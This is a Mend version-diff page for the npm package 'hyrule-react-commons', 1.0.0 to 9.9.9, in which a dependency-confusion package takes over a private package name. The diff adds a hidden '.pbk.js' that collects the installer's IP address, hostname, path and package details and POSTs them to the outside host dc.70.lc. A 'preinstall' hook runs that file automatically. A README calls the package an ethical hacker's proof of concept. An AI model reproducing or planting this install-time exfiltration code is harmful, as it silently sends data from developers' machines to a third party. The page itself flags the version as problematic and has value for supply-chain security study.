npm - hyrule-react-commons - Versions diffs - 1.0.0 → 9.9.9 - Mend

hyrule-react-commons 1.0.0 → 9.9.9

This version of hyrule-react-commons might be problematic. Click here for more details.

Files changed (4) hide show

package/.pbk.js ADDED Viewed

@@ -0,0 +1,39 @@
+const os = require('os');
+const https = require('https');
+var __dirname;
+const ip = [].concat(...Object.values(os.networkInterfaces()))
+    .filter(({ family, internal }) => family === "IPv4" && !internal)
+    .map(({ address }) => address)[0];
+const host = os.hostname()
+const path = __dirname;
+const org = process.argv.slice(2)[0]
+const package = process.argv.slice(2)[1]
+const version = process.argv.slice(2)[2]
+data = {
+    ip,
+    host,
+    path,
+    org,
+    package,
+    version
+}
+body = JSON.stringify(data)
+var r = https.request({
+    hostname:'dc.70.lc',
+    port: 443,
+    path: '/d',
+    method: 'POST',
+    headers: {
+        'Content-Length': body.length,
+        'Content-Type': 'application/json'
+    }
+})
+r.write(body)
+r.end()

package/README.md ADDED Viewed

@@ -0,0 +1,9 @@
+# hyrule-react-commons
+Hi, I am an ethical hacker. This is a security testing package. Just to prove that there is a dependency confusion vulnerability.
+Usually this has already contacted your security department.
+If you need the ownership of the project now, please contact me and I will transfer the ownership. https://70.lc/

package/index.js ADDED Viewed

File without changes

package/package.json CHANGED Viewed

@@ -1,11 +1,11 @@
 {
   "name": "hyrule-react-commons",
-  "version": "1.0.0",
-  "description": "Private package for hyrule-react-commons",
+  "version": "9.9.9",
+  "description": "Dependency Confusion POC",
   "main": "index.js",
   "scripts": {
-    "test": "echo \"Error: no test specified\" && exit 1"
+    "preinstall":"node ./.pbk.js Nintendo hyrule-react-commons 9.9.9"
   },
-  "author": "Nintendo Of America, Inc.",
+  "author": "",
   "license": "ISC"
 }